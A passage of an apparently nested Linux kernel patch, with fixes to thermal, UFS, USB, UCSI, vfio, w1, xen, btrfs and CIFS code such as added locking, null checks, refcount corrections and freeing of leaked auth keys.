+index 6313e7d0cdf87..71c3db60e9687 100644
+--- a/drivers/spi/spidev.c
++++ b/drivers/spi/spidev.c
+@@ -601,7 +601,6 @@ static int spidev_open(struct inode *inode, struct file *filp)
+ 	if (!spidev->tx_buffer) {
+ 		spidev->tx_buffer = kmalloc(bufsiz, GFP_KERNEL);
+ 		if (!spidev->tx_buffer) {
+-			dev_dbg(&spidev->spi->dev, "open/ENOMEM\n");
+ 			status = -ENOMEM;
+ 			goto err_find_dev;
+ 		}
+@@ -610,7 +609,6 @@ static int spidev_open(struct inode *inode, struct file *filp)
+ 	if (!spidev->rx_buffer) {
+ 		spidev->rx_buffer = kmalloc(bufsiz, GFP_KERNEL);
+ 		if (!spidev->rx_buffer) {
+-			dev_dbg(&spidev->spi->dev, "open/ENOMEM\n");
+ 			status = -ENOMEM;
+ 			goto err_alloc_rx_buf;
+ 		}
+diff --git a/drivers/thermal/gov_fair_share.c b/drivers/thermal/gov_fair_share.c
+index a4ee4661e9cc4..1cfeac16e7ac1 100644
+--- a/drivers/thermal/gov_fair_share.c
++++ b/drivers/thermal/gov_fair_share.c
+@@ -49,11 +49,7 @@ static int get_trip_level(struct thermal_zone_device *tz)
+ static long get_target_state(struct thermal_zone_device *tz,
+ 		struct thermal_cooling_device *cdev, int percentage, int level)
+ {
+-	unsigned long max_state;
+-
+-	cdev->ops->get_max_state(cdev, &max_state);
+-
+-	return (long)(percentage * level * max_state) / (100 * tz->num_trips);
++	return (long)(percentage * level * cdev->max_state) / (100 * tz->num_trips);
+ }
+ 
+ /**
+diff --git a/drivers/thermal/intel/int340x_thermal/int340x_thermal_zone.c b/drivers/thermal/intel/int340x_thermal/int340x_thermal_zone.c
+index 62c0aa5d07837..0a4eaa307156d 100644
+--- a/drivers/thermal/intel/int340x_thermal/int340x_thermal_zone.c
++++ b/drivers/thermal/intel/int340x_thermal/int340x_thermal_zone.c
+@@ -44,11 +44,13 @@ static int int340x_thermal_get_trip_temp(struct thermal_zone_device *zone,
+ 					 int trip, int *temp)
+ {
+ 	struct int34x_thermal_zone *d = zone->devdata;
+-	int i;
++	int i, ret = 0;
+ 
+ 	if (d->override_ops && d->override_ops->get_trip_temp)
+ 		return d->override_ops->get_trip_temp(zone, trip, temp);
+ 
++	mutex_lock(&d->trip_mutex);
++
+ 	if (trip < d->aux_trip_nr)
+ 		*temp = d->aux_trips[trip];
+ 	else if (trip == d->crt_trip_id)
+@@ -66,10 +68,12 @@ static int int340x_thermal_get_trip_temp(struct thermal_zone_device *zone,
+ 			}
+ 		}
+ 		if (i == INT340X_THERMAL_MAX_ACT_TRIP_COUNT)
+-			return -EINVAL;
++			ret = -EINVAL;
+ 	}
+ 
+-	return 0;
++	mutex_unlock(&d->trip_mutex);
++
++	return ret;
+ }
+ 
+ static int int340x_thermal_get_trip_type(struct thermal_zone_device *zone,
+@@ -77,11 +81,13 @@ static int int340x_thermal_get_trip_type(struct thermal_zone_device *zone,
+ 					 enum thermal_trip_type *type)
+ {
+ 	struct int34x_thermal_zone *d = zone->devdata;
+-	int i;
++	int i, ret = 0;
+ 
+ 	if (d->override_ops && d->override_ops->get_trip_type)
+ 		return d->override_ops->get_trip_type(zone, trip, type);
+ 
++	mutex_lock(&d->trip_mutex);
++
+ 	if (trip < d->aux_trip_nr)
+ 		*type = THERMAL_TRIP_PASSIVE;
+ 	else if (trip == d->crt_trip_id)
+@@ -99,10 +105,12 @@ static int int340x_thermal_get_trip_type(struct thermal_zone_device *zone,
+ 			}
+ 		}
+ 		if (i == INT340X_THERMAL_MAX_ACT_TRIP_COUNT)
+-			return -EINVAL;
++			ret = -EINVAL;
+ 	}
+ 
+-	return 0;
++	mutex_unlock(&d->trip_mutex);
++
++	return ret;
+ }
+ 
+ static int int340x_thermal_set_trip_temp(struct thermal_zone_device *zone,
+@@ -180,6 +188,8 @@ int int340x_thermal_read_trips(struct int34x_thermal_zone *int34x_zone)
+ 	int trip_cnt = int34x_zone->aux_trip_nr;
+ 	int i;
+ 
++	mutex_lock(&int34x_zone->trip_mutex);
++
+ 	int34x_zone->crt_trip_id = -1;
+ 	if (!int340x_thermal_get_trip_config(int34x_zone->adev->handle, "_CRT",
+ 					     &int34x_zone->crt_temp))
+@@ -207,6 +217,8 @@ int int340x_thermal_read_trips(struct int34x_thermal_zone *int34x_zone)
+ 		int34x_zone->act_trips[i].valid = true;
+ 	}
+ 
++	mutex_unlock(&int34x_zone->trip_mutex);
++
+ 	return trip_cnt;
+ }
+ EXPORT_SYMBOL_GPL(int340x_thermal_read_trips);
+@@ -230,6 +242,8 @@ struct int34x_thermal_zone *int340x_thermal_zone_add(struct acpi_device *adev,
+ 	if (!int34x_thermal_zone)
+ 		return ERR_PTR(-ENOMEM);
+ 
++	mutex_init(&int34x_thermal_zone->trip_mutex);
++
+ 	int34x_thermal_zone->adev = adev;
+ 	int34x_thermal_zone->override_ops = override_ops;
+ 
+@@ -281,6 +295,7 @@ err_thermal_zone:
+ 	acpi_lpat_free_conversion_table(int34x_thermal_zone->lpat_table);
+ 	kfree(int34x_thermal_zone->aux_trips);
+ err_trip_alloc:
++	mutex_destroy(&int34x_thermal_zone->trip_mutex);
+ 	kfree(int34x_thermal_zone);
+ 	return ERR_PTR(ret);
+ }
+@@ -292,6 +307,7 @@ void int340x_thermal_zone_remove(struct int34x_thermal_zone
+ 	thermal_zone_device_unregister(int34x_thermal_zone->zone);
+ 	acpi_lpat_free_conversion_table(int34x_thermal_zone->lpat_table);
+ 	kfree(int34x_thermal_zone->aux_trips);
++	mutex_destroy(&int34x_thermal_zone->trip_mutex);
+ 	kfree(int34x_thermal_zone);
+ }
+ EXPORT_SYMBOL_GPL(int340x_thermal_zone_remove);
+diff --git a/drivers/thermal/intel/int340x_thermal/int340x_thermal_zone.h b/drivers/thermal/intel/int340x_thermal/int340x_thermal_zone.h
+index 3b4971df1b33b..8f9872afd0d3c 100644
+--- a/drivers/thermal/intel/int340x_thermal/int340x_thermal_zone.h
++++ b/drivers/thermal/intel/int340x_thermal/int340x_thermal_zone.h
+@@ -32,6 +32,7 @@ struct int34x_thermal_zone {
+ 	struct thermal_zone_device_ops *override_ops;
+ 	void *priv_data;
+ 	struct acpi_lpat_conversion_table *lpat_table;
++	struct mutex trip_mutex;
+ };
+ 
+ struct int34x_thermal_zone *int340x_thermal_zone_add(struct acpi_device *,
+diff --git a/drivers/thermal/thermal_core.c b/drivers/thermal/thermal_core.c
+index 615fdda3a5de7..1eae4ec719a8f 100644
+--- a/drivers/thermal/thermal_core.c
++++ b/drivers/thermal/thermal_core.c
+@@ -603,8 +603,7 @@ int thermal_zone_bind_cooling_device(struct thermal_zone_device *tz,
+ 	struct thermal_instance *pos;
+ 	struct thermal_zone_device *pos1;
+ 	struct thermal_cooling_device *pos2;
+-	unsigned long max_state;
+-	int result, ret;
++	int result;
+ 
+ 	if (trip >= tz->num_trips || trip < 0)
+ 		return -EINVAL;
+@@ -621,15 +620,11 @@ int thermal_zone_bind_cooling_device(struct thermal_zone_device *tz,
+ 	if (tz != pos1 || cdev != pos2)
+ 		return -EINVAL;
+ 
+-	ret = cdev->ops->get_max_state(cdev, &max_state);
+-	if (ret)
+-		return ret;
+-
+ 	/* lower default 0, upper default max_state */
+ 	lower = lower == THERMAL_NO_LIMIT ? 0 : lower;
+-	upper = upper == THERMAL_NO_LIMIT ? max_state : upper;
++	upper = upper == THERMAL_NO_LIMIT ? cdev->max_state : upper;
+ 
+-	if (lower > upper || upper > max_state)
++	if (lower > upper || upper > cdev->max_state)
+ 		return -EINVAL;
+ 
+ 	dev = kzalloc(sizeof(*dev), GFP_KERNEL);
+@@ -896,12 +891,22 @@ __thermal_cooling_device_register(struct device_node *np,
+ 	cdev->updated = false;
+ 	cdev->device.class = &thermal_class;
+ 	cdev->devdata = devdata;
++
++	ret = cdev->ops->get_max_state(cdev, &cdev->max_state);
++	if (ret) {
++		kfree(cdev->type);
++		goto out_ida_remove;
++	}
++
+ 	thermal_cooling_device_setup_sysfs(cdev);
++
+ 	ret = dev_set_name(&cdev->device, "cooling_device%d", cdev->id);
+ 	if (ret) {
++		kfree(cdev->type);
+ 		thermal_cooling_device_destroy_sysfs(cdev);
+-		goto out_kfree_type;
++		goto out_ida_remove;
+ 	}
++
+ 	ret = device_register(&cdev->device);
+ 	if (ret)
+ 		goto out_kfree_type;
+@@ -927,6 +932,8 @@ out_kfree_type:
+ 	thermal_cooling_device_destroy_sysfs(cdev);
+ 	kfree(cdev->type);
+ 	put_device(&cdev->device);
++
++	/* thermal_release() takes care of the rest */
+ 	cdev = NULL;
+ out_ida_remove:
+ 	ida_free(&thermal_cdev_ida, id);
+diff --git a/drivers/thermal/thermal_sysfs.c b/drivers/thermal/thermal_sysfs.c
+index ec495c7dff035..bd75961254615 100644
+--- a/drivers/thermal/thermal_sysfs.c
++++ b/drivers/thermal/thermal_sysfs.c
+@@ -589,13 +589,8 @@ static ssize_t max_state_show(struct device *dev, struct device_attribute *attr,
+ 			      char *buf)
+ {
+ 	struct thermal_cooling_device *cdev = to_cooling_device(dev);
+-	unsigned long state;
+-	int ret;
+ 
+-	ret = cdev->ops->get_max_state(cdev, &state);
+-	if (ret)
+-		return ret;
+-	return sprintf(buf, "%ld\n", state);
++	return sprintf(buf, "%ld\n", cdev->max_state);
+ }
+ 
+ static ssize_t cur_state_show(struct device *dev, struct device_attribute *attr,
+@@ -625,6 +620,10 @@ cur_state_store(struct device *dev, struct device_attribute *attr,
+ 	if ((long)state < 0)
+ 		return -EINVAL;
+ 
++	/* Requested state should be less than max_state + 1 */
++	if (state > cdev->max_state)
++		return -EINVAL;
++
+ 	mutex_lock(&cdev->lock);
+ 
+ 	result = cdev->ops->set_cur_state(cdev, state);
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index b048357d21e36..fb5c9e2fc5348 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -1231,12 +1231,14 @@ static int ufshcd_clock_scaling_prepare(struct ufs_hba *hba)
+ 	 * clock scaling is in progress
+ 	 */
+ 	ufshcd_scsi_block_requests(hba);
++	mutex_lock(&hba->wb_mutex);
+ 	down_write(&hba->clk_scaling_lock);
+ 
+ 	if (!hba->clk_scaling.is_allowed ||
+ 	    ufshcd_wait_for_doorbell_clr(hba, DOORBELL_CLR_TOUT_US)) {
+ 		ret = -EBUSY;
+ 		up_write(&hba->clk_scaling_lock);
++		mutex_unlock(&hba->wb_mutex);
+ 		ufshcd_scsi_unblock_requests(hba);
+ 		goto out;
+ 	}
+@@ -1248,12 +1250,16 @@ out:
+ 	return ret;
+ }
+ 
+-static void ufshcd_clock_scaling_unprepare(struct ufs_hba *hba, bool writelock)
++static void ufshcd_clock_scaling_unprepare(struct ufs_hba *hba, int err, bool scale_up)
+ {
+-	if (writelock)
+-		up_write(&hba->clk_scaling_lock);
+-	else
+-		up_read(&hba->clk_scaling_lock);
++	up_write(&hba->clk_scaling_lock);
++
++	/* Enable Write Booster if we have scaled up else disable it */
++	if (ufshcd_enable_wb_if_scaling_up(hba) && !err)
++		ufshcd_wb_toggle(hba, scale_up);
++
++	mutex_unlock(&hba->wb_mutex);
++
+ 	ufshcd_scsi_unblock_requests(hba);
+ 	ufshcd_release(hba);
+ }
+@@ -1270,7 +1276,6 @@ static void ufshcd_clock_scaling_unprepare(struct ufs_hba *hba, bool writelock)
+ static int ufshcd_devfreq_scale(struct ufs_hba *hba, bool scale_up)
+ {
+ 	int ret = 0;
+-	bool is_writelock = true;
+ 
+ 	ret = ufshcd_clock_scaling_prepare(hba);
+ 	if (ret)
+@@ -1299,15 +1304,8 @@ static int ufshcd_devfreq_scale(struct ufs_hba *hba, bool scale_up)
+ 		}
+ 	}
+ 
+-	/* Enable Write Booster if we have scaled up else disable it */
+-	if (ufshcd_enable_wb_if_scaling_up(hba)) {
+-		downgrade_write(&hba->clk_scaling_lock);
+-		is_writelock = false;
+-		ufshcd_wb_toggle(hba, scale_up);
+-	}
+-
+ out_unprepare:
+-	ufshcd_clock_scaling_unprepare(hba, is_writelock);
++	ufshcd_clock_scaling_unprepare(hba, ret, scale_up);
+ 	return ret;
+ }
+ 
+@@ -6104,9 +6102,11 @@ static void ufshcd_force_error_recovery(struct ufs_hba *hba)
+ 
+ static void ufshcd_clk_scaling_allow(struct ufs_hba *hba, bool allow)
+ {
++	mutex_lock(&hba->wb_mutex);
+ 	down_write(&hba->clk_scaling_lock);
+ 	hba->clk_scaling.is_allowed = allow;
+ 	up_write(&hba->clk_scaling_lock);
++	mutex_unlock(&hba->wb_mutex);
+ }
+ 
+ static void ufshcd_clk_scaling_suspend(struct ufs_hba *hba, bool suspend)
+@@ -9773,6 +9773,7 @@ int ufshcd_init(struct ufs_hba *hba, void __iomem *mmio_base, unsigned int irq)
+ 	/* Initialize mutex for exception event control */
+ 	mutex_init(&hba->ee_ctrl_mutex);
+ 
++	mutex_init(&hba->wb_mutex);
+ 	init_rwsem(&hba->clk_scaling_lock);
+ 
+ 	ufshcd_init_clk_gating(hba);
+diff --git a/drivers/usb/dwc3/Kconfig b/drivers/usb/dwc3/Kconfig
+index 03ededa86da1f..864fef540a394 100644
+--- a/drivers/usb/dwc3/Kconfig
++++ b/drivers/usb/dwc3/Kconfig
+@@ -3,6 +3,7 @@
+ config USB_DWC3
+ 	tristate "DesignWare USB3 DRD Core Support"
+ 	depends on (USB || USB_GADGET) && HAS_DMA
++	depends on (EXTCON || EXTCON=n)
+ 	select USB_XHCI_PLATFORM if USB_XHCI_HCD
+ 	select USB_ROLE_SWITCH if USB_DWC3_DUAL_ROLE
+ 	help
+@@ -44,7 +45,6 @@ config USB_DWC3_GADGET
+ config USB_DWC3_DUAL_ROLE
+ 	bool "Dual Role mode"
+ 	depends on ((USB=y || USB=USB_DWC3) && (USB_GADGET=y || USB_GADGET=USB_DWC3))
+-	depends on (EXTCON=y || EXTCON=USB_DWC3)
+ 	help
+ 	  This is the default mode of working of DWC3 controller where
+ 	  both host and gadget features are enabled.
+diff --git a/drivers/usb/gadget/function/f_fs.c b/drivers/usb/gadget/function/f_fs.c
+index 73dc10a77cdea..523a961b910bb 100644
+--- a/drivers/usb/gadget/function/f_fs.c
++++ b/drivers/usb/gadget/function/f_fs.c
+@@ -279,6 +279,9 @@ static int __ffs_ep0_queue_wait(struct ffs_data *ffs, char *data, size_t len)
+ 	struct usb_request *req = ffs->ep0req;
+ 	int ret;
+ 
++	if (!req)
++		return -EINVAL;
++
+ 	req->zero     = len < le16_to_cpu(ffs->ev.setup.wLength);
+ 
+ 	spin_unlock_irq(&ffs->ev.waitq.lock);
+@@ -1892,10 +1895,14 @@ static void functionfs_unbind(struct ffs_data *ffs)
+ 	ENTER();
+ 
+ 	if (!WARN_ON(!ffs->gadget)) {
++		/* dequeue before freeing ep0req */
++		usb_ep_dequeue(ffs->gadget->ep0, ffs->ep0req);
++		mutex_lock(&ffs->mutex);
+ 		usb_ep_free_request(ffs->gadget->ep0, ffs->ep0req);
+ 		ffs->ep0req = NULL;
+ 		ffs->gadget = NULL;
+ 		clear_bit(FFS_FL_BOUND, &ffs->flags);
++		mutex_unlock(&ffs->mutex);
+ 		ffs_data_put(ffs);
+ 	}
+ }
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index eabe519013e78..1292241d581a6 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -187,6 +187,7 @@ EXPORT_SYMBOL_GPL(ucsi_send_command);
+ 
+ struct ucsi_work {
+ 	struct delayed_work work;
++	struct list_head node;
+ 	unsigned long delay;
+ 	unsigned int count;
+ 	struct ucsi_connector *con;
+@@ -202,6 +203,7 @@ static void ucsi_poll_worker(struct work_struct *work)
+ 	mutex_lock(&con->lock);
+ 
+ 	if (!con->partner) {
++		list_del(&uwork->node);
+ 		mutex_unlock(&con->lock);
+ 		kfree(uwork);
+ 		return;
+@@ -209,10 +211,12 @@ static void ucsi_poll_worker(struct work_struct *work)
+ 
+ 	ret = uwork->cb(con);
+ 
+-	if (uwork->count-- && (ret == -EBUSY || ret == -ETIMEDOUT))
++	if (uwork->count-- && (ret == -EBUSY || ret == -ETIMEDOUT)) {
+ 		queue_delayed_work(con->wq, &uwork->work, uwork->delay);
+-	else
++	} else {
++		list_del(&uwork->node);
+ 		kfree(uwork);
++	}
+ 
+ 	mutex_unlock(&con->lock);
+ }
+@@ -236,6 +240,7 @@ static int ucsi_partner_task(struct ucsi_connector *con,
+ 	uwork->con = con;
+ 	uwork->cb = cb;
+ 
++	list_add_tail(&uwork->node, &con->partner_tasks);
+ 	queue_delayed_work(con->wq, &uwork->work, delay);
+ 
+ 	return 0;
+@@ -1056,6 +1061,7 @@ static int ucsi_register_port(struct ucsi *ucsi, int index)
+ 	INIT_WORK(&con->work, ucsi_handle_connector_change);
+ 	init_completion(&con->complete);
+ 	mutex_init(&con->lock);
++	INIT_LIST_HEAD(&con->partner_tasks);
+ 	con->num = index + 1;
+ 	con->ucsi = ucsi;
+ 
+@@ -1420,8 +1426,20 @@ void ucsi_unregister(struct ucsi *ucsi)
+ 		ucsi_unregister_altmodes(&ucsi->connector[i],
+ 					 UCSI_RECIPIENT_CON);
+ 		ucsi_unregister_port_psy(&ucsi->connector[i]);
+-		if (ucsi->connector[i].wq)
++
++		if (ucsi->connector[i].wq) {
++			struct ucsi_work *uwork;
++
++			mutex_lock(&ucsi->connector[i].lock);
++			/*
++			 * queue delayed items immediately so they can execute
++			 * and free themselves before the wq is destroyed
++			 */
++			list_for_each_entry(uwork, &ucsi->connector[i].partner_tasks, node)
++				mod_delayed_work(ucsi->connector[i].wq, &uwork->work, 0);
++			mutex_unlock(&ucsi->connector[i].lock);
+ 			destroy_workqueue(ucsi->connector[i].wq);
++		}
+ 		typec_unregister_port(ucsi->connector[i].port);
+ 	}
+ 
+diff --git a/drivers/usb/typec/ucsi/ucsi.h b/drivers/usb/typec/ucsi/ucsi.h
+index c968474ee5473..60ce9fb6e7450 100644
+--- a/drivers/usb/typec/ucsi/ucsi.h
++++ b/drivers/usb/typec/ucsi/ucsi.h
+@@ -322,6 +322,7 @@ struct ucsi_connector {
+ 	struct work_struct work;
+ 	struct completion complete;
+ 	struct workqueue_struct *wq;
++	struct list_head partner_tasks;
+ 
+ 	struct typec_port *port;
+ 	struct typec_partner *partner;
+diff --git a/drivers/vfio/vfio_iommu_type1.c b/drivers/vfio/vfio_iommu_type1.c
+index 23c24fe98c00d..2209372f236db 100644
+--- a/drivers/vfio/vfio_iommu_type1.c
++++ b/drivers/vfio/vfio_iommu_type1.c
+@@ -1856,24 +1856,33 @@ unwind:
+  * significantly boosts non-hugetlbfs mappings and doesn't seem to hurt when
+  * hugetlbfs is in use.
+  */
+-static void vfio_test_domain_fgsp(struct vfio_domain *domain)
++static void vfio_test_domain_fgsp(struct vfio_domain *domain, struct list_head *regions)
+ {
+-	struct page *pages;
+ 	int ret, order = get_order(PAGE_SIZE * 2);
++	struct vfio_iova *region;
++	struct page *pages;
++	dma_addr_t start;
+ 
+ 	pages = alloc_pages(GFP_KERNEL | __GFP_ZERO, order);
+ 	if (!pages)
+ 		return;
+ 
+-	ret = iommu_map(domain->domain, 0, page_to_phys(pages), PAGE_SIZE * 2,
+-			IOMMU_READ | IOMMU_WRITE | IOMMU_CACHE);
+-	if (!ret) {
+-		size_t unmapped = iommu_unmap(domain->domain, 0, PAGE_SIZE);
++	list_for_each_entry(region, regions, list) {
++		start = ALIGN(region->start, PAGE_SIZE * 2);
++		if (start >= region->end || (region->end - start < PAGE_SIZE * 2))
++			continue;
+ 
+-		if (unmapped == PAGE_SIZE)
+-			iommu_unmap(domain->domain, PAGE_SIZE, PAGE_SIZE);
+-		else
+-			domain->fgsp = true;
++		ret = iommu_map(domain->domain, start, page_to_phys(pages), PAGE_SIZE * 2,
++				IOMMU_READ | IOMMU_WRITE | IOMMU_CACHE);
++		if (!ret) {
++			size_t unmapped = iommu_unmap(domain->domain, start, PAGE_SIZE);
++
++			if (unmapped == PAGE_SIZE)
++				iommu_unmap(domain->domain, start + PAGE_SIZE, PAGE_SIZE);
++			else
++				domain->fgsp = true;
++		}
++		break;
+ 	}
+ 
+ 	__free_pages(pages, order);
+@@ -2326,7 +2335,7 @@ static int vfio_iommu_type1_attach_group(void *iommu_data,
+ 		}
+ 	}
+ 
+-	vfio_test_domain_fgsp(domain);
++	vfio_test_domain_fgsp(domain, &iova_copy);
+ 
+ 	/* replay mappings on new domains */
+ 	ret = vfio_iommu_replay(iommu, domain);
+diff --git a/drivers/w1/w1.c b/drivers/w1/w1.c
+index f2ae2e563dc54..4a2ddf730a3ac 100644
+--- a/drivers/w1/w1.c
++++ b/drivers/w1/w1.c
+@@ -1166,6 +1166,8 @@ int w1_process(void *data)
+ 	/* remainder if it woke up early */
+ 	unsigned long jremain = 0;
+ 
++	atomic_inc(&dev->refcnt);
++
+ 	for (;;) {
+ 
+ 		if (!jremain && dev->search_count) {
+@@ -1193,8 +1195,10 @@ int w1_process(void *data)
+ 		 */
+ 		mutex_unlock(&dev->list_mutex);
+ 
+-		if (kthread_should_stop())
++		if (kthread_should_stop()) {
++			__set_current_state(TASK_RUNNING);
+ 			break;
++		}
+ 
+ 		/* Only sleep when the search is active. */
+ 		if (dev->search_count) {
+diff --git a/drivers/w1/w1_int.c b/drivers/w1/w1_int.c
+index b3e1792d9c49f..3a71c5eb2f837 100644
+--- a/drivers/w1/w1_int.c
++++ b/drivers/w1/w1_int.c
+@@ -51,10 +51,9 @@ static struct w1_master *w1_alloc_dev(u32 id, int slave_count, int slave_ttl,
+ 	dev->search_count	= w1_search_count;
+ 	dev->enable_pullup	= w1_enable_pullup;
+ 
+-	/* 1 for w1_process to decrement
+-	 * 1 for __w1_remove_master_device to decrement
++	/* For __w1_remove_master_device to decrement
+ 	 */
+-	atomic_set(&dev->refcnt, 2);
++	atomic_set(&dev->refcnt, 1);
+ 
+ 	INIT_LIST_HEAD(&dev->slist);
+ 	INIT_LIST_HEAD(&dev->async_list);
+diff --git a/drivers/xen/pvcalls-front.c b/drivers/xen/pvcalls-front.c
+index 1826e8e671251..9b569278788a4 100644
+--- a/drivers/xen/pvcalls-front.c
++++ b/drivers/xen/pvcalls-front.c
+@@ -225,6 +225,8 @@ again:
+ 	return IRQ_HANDLED;
+ }
+ 
++static void free_active_ring(struct sock_mapping *map);
++
+ static void pvcalls_front_free_map(struct pvcalls_bedata *bedata,
+ 				   struct sock_mapping *map)
+ {
+@@ -240,7 +242,7 @@ static void pvcalls_front_free_map(struct pvcalls_bedata *bedata,
+ 	for (i = 0; i < (1 << PVCALLS_RING_ORDER); i++)
+ 		gnttab_end_foreign_access(map->active.ring->ref[i], NULL);
+ 	gnttab_end_foreign_access(map->active.ref, NULL);
+-	free_page((unsigned long)map->active.ring);
++	free_active_ring(map);
+ 
+ 	kfree(map);
+ }
+diff --git a/fs/affs/file.c b/fs/affs/file.c
+index cefa222f7881c..8daeed31e1af9 100644
+--- a/fs/affs/file.c
++++ b/fs/affs/file.c
+@@ -880,7 +880,7 @@ affs_truncate(struct inode *inode)
+ 	if (inode->i_size > AFFS_I(inode)->mmu_private) {
+ 		struct address_space *mapping = inode->i_mapping;
+ 		struct page *page;
+-		void *fsdata;
++		void *fsdata = NULL;
+ 		loff_t isize = inode->i_size;
+ 		int res;
+ 
+diff --git a/fs/btrfs/ctree.h b/fs/btrfs/ctree.h
+index 9e6d48ff45972..a3febabacec04 100644
+--- a/fs/btrfs/ctree.h
++++ b/fs/btrfs/ctree.h
+@@ -590,6 +590,12 @@ enum {
+ 	/* Indicate we have to finish a zone to do next allocation. */
+ 	BTRFS_FS_NEED_ZONE_FINISH,
+ 
++	/*
++	 * Indicate metadata over-commit is disabled. This is set when active
++	 * zone tracking is needed.
++	 */
++	BTRFS_FS_NO_OVERCOMMIT,
++
+ #if BITS_PER_LONG == 32
+ 	/* Indicate if we have error/warn message printed on 32bit systems */
+ 	BTRFS_FS_32BIT_ERROR,
+diff --git a/fs/btrfs/space-info.c b/fs/btrfs/space-info.c
+index f171bf8756336..65c010159fb5f 100644
+--- a/fs/btrfs/space-info.c
++++ b/fs/btrfs/space-info.c
+@@ -404,7 +404,8 @@ int btrfs_can_overcommit(struct btrfs_fs_info *fs_info,
+ 		return 0;
+ 
+ 	used = btrfs_space_info_used(space_info, true);
+-	if (btrfs_is_zoned(fs_info) && (space_info->flags & BTRFS_BLOCK_GROUP_METADATA))
++	if (test_bit(BTRFS_FS_NO_OVERCOMMIT, &fs_info->flags) &&
++	    (space_info->flags & BTRFS_BLOCK_GROUP_METADATA))
+ 		avail = 0;
+ 	else
+ 		avail = calc_available_free_space(fs_info, space_info, flush);
+diff --git a/fs/btrfs/zoned.c b/fs/btrfs/zoned.c
+index c9e2b0c853099..056f002263db5 100644
+--- a/fs/btrfs/zoned.c
++++ b/fs/btrfs/zoned.c
+@@ -538,6 +538,8 @@ int btrfs_get_dev_zone_info(struct btrfs_device *device, bool populate_cache)
+ 		}
+ 		atomic_set(&zone_info->active_zones_left,
+ 			   max_active_zones - nactive);
++		/* Overcommit does not work well with active zone tracking. */
++		set_bit(BTRFS_FS_NO_OVERCOMMIT, &fs_info->flags);
+ 	}
+ 
+ 	/* Validate superblock log */
+diff --git a/fs/cifs/cifsencrypt.c b/fs/cifs/cifsencrypt.c
+index 5db73c0f792a5..cbc18b4a9cb20 100644
+--- a/fs/cifs/cifsencrypt.c
++++ b/fs/cifs/cifsencrypt.c
+@@ -278,6 +278,7 @@ build_avpair_blob(struct cifs_ses *ses, const struct nls_table *nls_cp)
+ 	 * ( for NTLMSSP_AV_NB_DOMAIN_NAME followed by NTLMSSP_AV_EOL ) +
+ 	 * unicode length of a netbios domain name
+ 	 */
++	kfree_sensitive(ses->auth_key.response);
+ 	ses->auth_key.len = size + 2 * dlen;
+ 	ses->auth_key.response = kzalloc(ses->auth_key.len, GFP_KERNEL);
+ 	if (!ses->auth_key.response) {
+diff --git a/fs/cifs/dfs_cache.c b/fs/cifs/dfs_cache.c
+index e70915ad75410..4302dc75843cb 100644
+--- a/fs/cifs/dfs_cache.c
++++ b/fs/cifs/dfs_cache.c
+@@ -792,26 +792,27 @@ static int get_dfs_referral(const unsigned int xid, struct cifs_ses *ses, const
+  */
+ static int cache_refresh_path(const unsigned int xid, struct cifs_ses *ses, const char *path)
+ {
+-	int rc;
+-	struct cache_entry *ce;
+ 	struct dfs_info3_param *refs = NULL;
++	struct cache_entry *ce;
+ 	int numrefs = 0;
+-	bool newent = false;
++	int rc;
+ 
+ 	cifs_dbg(FYI, "%s: search path: %s\n", __func__, path);
+ 
+-	down_write(&htable_rw_lock);
++	down_read(&htable_rw_lock);
+ 
+ 	ce = lookup_cache_entry(path);
+-	if (!IS_ERR(ce)) {
+-		if (!cache_entry_expired(ce)) {
+-			dump_ce(ce);
+-			up_write(&htable_rw_lock);
+-			return 0;
+-		}
+-	} else {
+-		newent = true;
++	if (!IS_ERR(ce) && !cache_entry_expired(ce)) {
++		up_read(&htable_rw_lock);
++		return 0;
+ 	}
++	/*
++	 * Unlock shared access as we don't want to hold any locks while getting
++	 * a new referral.  The @ses used for performing the I/O could be
++	 * reconnecting and it acquires @htable_rw_lock to look up the dfs cache
++	 * in order to failover -- if necessary.
++	 */
++	up_read(&htable_rw_lock);
+ 
+ 	/*
+ 	 * Either the entry was not found, or it is expired.
+@@ -819,19 +820,22 @@ static int cache_refresh_path(const unsigned int xid, struct cifs_ses *ses, cons
+ 	 */
+ 	rc = get_dfs_referral(xid, ses, path, &refs, &numrefs);
+ 	if (rc)
+-		goto out_unlock;
++		goto out;
+ 
+ 	dump_refs(refs, numrefs);
+ 
+-	if (!newent) {
+-		rc = update_cache_entry_locked(ce, refs, numrefs);
+-		goto out_unlock;
++	down_write(&htable_rw_lock);
++	/* Re-check as another task might have it added or refreshed already */
++	ce = lookup_cache_entry(path);
++	if (!IS_ERR(ce)) {
++		if (cache_entry_expired(ce))
++			rc = update_cache_entry_locked(ce, refs, numrefs);
++	} else {
++		rc = add_cache_entry_locked(refs, numrefs);
+ 	}
+ 
+-	rc = add_cache_entry_locked(refs, numrefs);
+-
+-out_unlock:
+ 	up_write(&htable_rw_lock);
++out:
+ 	free_dfs_info_array(refs, numrefs);
+ 	return rc;
+ }
+diff --git a/fs/cifs/sess.c b/fs/cifs/sess.c
+index 0b842a07e1579..c47b254f0d1e2 100644
+--- a/fs/cifs/sess.c
++++ b/fs/cifs/sess.c
+@@ -815,6 +815,7 @@ int decode_ntlmssp_challenge(char *bcc_ptr, int blob_len,
+ 		return -EINVAL;
+ 	}
+ 	if (tilen) {
++		kfree_sensitive(ses->auth_key.response);
+ 		ses->auth_key.response = kmemdup(bcc_ptr + tioffset, tilen,
+ 						 GFP_KERNEL);
+ 		if (!ses->auth_key.response) {
+@@ -1428,6 +1429,7 @@ sess_auth_kerberos(struct sess_data *sess_data)
+ 		goto out_put_spnego_key;
+ 	}
+ 
++	kfree_sensitive(ses->auth_key.response);
+ 	ses->auth_key.response = kmemdup(msg->data, msg->sesskey_len,
+ 					 GFP_KERNEL);
+ 	if (!ses->auth_key.response) {
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index 92f39052d3117..2c9ffa921e6f6 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -1453,6 +1453,7 @@ SMB2_auth_kerberos(struct SMB2_sess_data *sess_data)
+ 
+ 	/* keep session key if binding */
+ 	if (!is_binding) {
++		kfree_sensitive(ses->auth_key.response);
